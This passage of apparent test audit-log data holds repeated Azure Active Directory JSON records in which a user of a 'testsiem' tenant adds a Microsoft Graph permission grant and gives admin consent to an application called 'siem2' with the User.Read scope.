"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": ""}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": ""}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": ""}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}, {"Name": "targetName", "Value": "Microsoft Graph"}, 
{"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "1e80f57e-764e-4c42-bead-7ccf998fe780"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"DisplayName\":null,\"ObjectClass\":\"ServicePrincipal\",\"AppId\":null,\"Name\":null}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:42.0571467Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34622817"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add 
OAuth2PermissionGrant.", "Id": "db3ce560-1c2f-4c85-b305-55ad6476250f"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:42", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Microsoft Graph"}, {"Type": 2, "ID": "00000003-0000-0000-c000-000000000000"}, {"Type": 4, "ID": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ObjectId": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"NewValue": "", "OldValue": "", "Name": "ServicePrincipal.DisplayName"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": ""}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": ""}, {"Name": 
"TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}, {"Name": "targetName", "Value": "Microsoft Graph"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "1e80f57e-764e-4c42-bead-7ccf998fe780"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"DisplayName\":null,\"ObjectClass\":\"ServicePrincipal\",\"AppId\":null,\"Name\":null}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; 
rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:42.0571467Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34622817"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add OAuth2PermissionGrant.", "Id": "db3ce560-1c2f-4c85-b305-55ad6476250f"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:42", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": 
"asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Microsoft Graph"}, {"Type": 2, "ID": "00000003-0000-0000-c000-000000000000"}, {"Type": 4, "ID": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ObjectId": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", "ModifiedProperties": [{"NewValue": "fb91e9f0-9485-4a68-89e9-a164d20ae855", "OldValue": "", "Name": "ServicePrincipal.ObjectID"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": ""}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": ""}, {"NewValue": "", "OldValue": "", "Name": "ServicePrincipal.Name"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": 
"asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}, {"Name": "targetName", "Value": "Microsoft Graph"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "1e80f57e-764e-4c42-bead-7ccf998fe780"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"DisplayName\":null,\"ObjectClass\":\"ServicePrincipal\",\"AppId\":null,\"Name\":null}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:42.0571467Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34622817"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": 
"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add OAuth2PermissionGrant.", "Id": "db3ce560-1c2f-4c85-b305-55ad6476250f"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:42", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem2"}, {"Type": 2, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Type": 4, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ModifiedProperties": [{"Name": 
"ConsentContext.IsAdminConsent", "OldValue": "", "NewValue": "True"}, {"Name": "ConsentContext.IsAppOnly", "OldValue": "", "NewValue": "False"}, {"Name": "ConsentContext.OnBehalfOfAll", "OldValue": "", "NewValue": "True"}, {"NewValue": "", "OldValue": "", "Name": "ConsentContext.Tags"}, {"Name": "ConsentAction.Permissions", "OldValue": "", "NewValue": "[] => [[Id: 8OmR-4WUaEqJ6aFk0groVfmOUpib6JpGsZv6jnKgD6Y, ClientId: fb91e9f0-9485-4a68-89e9-a164d20ae855, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; "}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ConsentContext.IsAdminConsent\",\"ConsentContext.IsAppOnly\",\"ConsentContext.OnBehalfOfAll\",\"ConsentContext.Tags\",\"ConsentAction.Permissions\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "1e80f57e-764e-4c42-bead-7ccf998fe780"}, {"Name": "version", "Value": 
"2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:42.1421458Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34622848"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Consent to application.", "Id": "24524679-8930-4afd-83b8-2dc70aa0a016"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:42", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, 
"UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem2"}, {"Type": 2, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Type": 4, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ModifiedProperties": [{"Name": "ConsentContext.IsAdminConsent", "OldValue": "", "NewValue": "True"}, {"NewValue": "False", "OldValue": "", "Name": "ConsentContext.IsAppOnly"}, {"Name": "ConsentContext.OnBehalfOfAll", "OldValue": "", "NewValue": "True"}, {"Name": "ConsentContext.Tags", "OldValue": "", "NewValue": ""}, {"Name": "ConsentAction.Permissions", "OldValue": "", "NewValue": "[] => [[Id: 8OmR-4WUaEqJ6aFk0groVfmOUpib6JpGsZv6jnKgD6Y, ClientId: fb91e9f0-9485-4a68-89e9-a164d20ae855, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; "}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": 
"fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ConsentContext.IsAdminConsent\",\"ConsentContext.IsAppOnly\",\"ConsentContext.OnBehalfOfAll\",\"ConsentContext.Tags\",\"ConsentAction.Permissions\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "1e80f57e-764e-4c42-bead-7ccf998fe780"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:42.1421458Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34622848"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Consent to application.", "Id": "24524679-8930-4afd-83b8-2dc70aa0a016"} 
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:42", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem2"}, {"Type": 2, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Type": 4, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ModifiedProperties": [{"Name": "ConsentContext.IsAdminConsent", "OldValue": "", "NewValue": "True"}, {"NewValue": "False", "OldValue": "", "Name": "ConsentContext.IsAppOnly"}, {"NewValue": "True", "OldValue": "", "Name": "ConsentContext.OnBehalfOfAll"}, {"Name": "ConsentContext.Tags", "OldValue": "", "NewValue": ""}, {"Name": "ConsentAction.Permissions", "OldValue": "", "NewValue": "[] => [[Id: 8OmR-4WUaEqJ6aFk0groVfmOUpib6JpGsZv6jnKgD6Y, ClientId: fb91e9f0-9485-4a68-89e9-a164d20ae855, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; "}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, 
